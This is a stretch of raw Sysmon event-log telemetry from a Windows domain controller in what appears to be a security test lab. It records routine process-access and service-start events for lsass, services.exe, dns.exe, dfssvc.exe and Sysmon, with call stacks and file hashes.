15:51:15.738{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C62-5FA1-0A00-000000008801}852948C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C62-5FA1-0A00-000000008801}852928C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001256Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.715{D28789B6-7C73-5FA1-3400-000000008801}2168C:\Windows\System32\dns.exe10.0.14393.3930 (rs1_release.200901-1914)Domain Name System (DNS) ServerMicrosoft® Windows® Operating SystemMicrosoft Corporationdns.exeC:\Windows\system32\dns.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=9D6D2A8F016923E865F944F5505CAFE6,SHA256=B48220FB5B78641ACF5566E798374E9C51FED61CE0559843364E7BD664C30864,IMPHASH=F11D7ACAC98040FCC69808598F92C5FA{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001255Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001254Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001253Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.738{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001252Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0A00-000000008801}8521184C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3600-000000008801}2504C:\Windows\system32\dfssvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001251Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3600-000000008801}2504C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001250Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3600-000000008801}2504C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001249Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.721{D28789B6-7C73-5FA1-3600-000000008801}2504C:\Windows\System32\dfssvc.exe10.0.14393.0 (rs1_release.160715-1616)Windows NT Distributed File System ServiceMicrosoft® Windows® Operating SystemMicrosoft Corporationdfssvc.exeC:\Windows\system32\dfssvc.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=304155A24E5273CF68197B30112D451A,SHA256=EC48F117C47F0E4BD5F7407629CE8CF78579764A7947CA05EDC089B59B941576,IMPHASH=C8B32AEEF22A97D88BD68D70385A1B30{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001248Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001247Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0A00-000000008801}8522660C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001246Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.698{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe12.01System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=3DF7619612EA38B34FB094A8B3B7EAD1,SHA256=D52CB464C0B281FB92CBE7FB5370769D6A00369E082DF9147FBE10822397565E,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001245Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0A00-000000008801}8522968C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3500-000000008801}2768C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001244Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-3500-000000008801}2768C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001243Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.722{D28789B6-7C62-5FA1-0A00-000000008801}8522968C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3200-000000008801}2576C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001242Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3500-000000008801}2768C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001241Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0A00-000000008801}8522484C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3500-000000008801}2768C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+52f1|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001240Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7C73-5FA1-3200-000000008801}2576C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001239Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3100-000000008801}2596C:\Windows\System32\ismserv.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001238Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C73-5FA1-3100-000000008801}2596C:\Windows\System32\ismserv.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001237Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0A00-000000008801}852952C:\Windows\system32\services.exe{D28789B6-7C73-5FA1-3200-000000008801}2576C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+20a11|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001236Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.707{D28789B6-7C73-5FA1-3200-000000008801}2576C:\Program Files\Amazon\XenTools\LiteAgent.exe1.0xenagentXENIFACEAmazon Inc.xenagent.exe"C:\Program Files\Amazon\XenTools\LiteAgent.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=3727559C2C2FE26EE668086FAF992815,SHA256=8130E7A850E0A088CB46F2595F7418CE9D73CE2F7750FC017ABC5CF3DED05F06,IMPHASH=C8B18E9A517CB77EA7AB3E7295D84FE8{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001235Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001234Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}86892C:\Windows\system32\lsass.exe{D28789B6-7C61-5FA1-0100-000000008801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:15.706{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 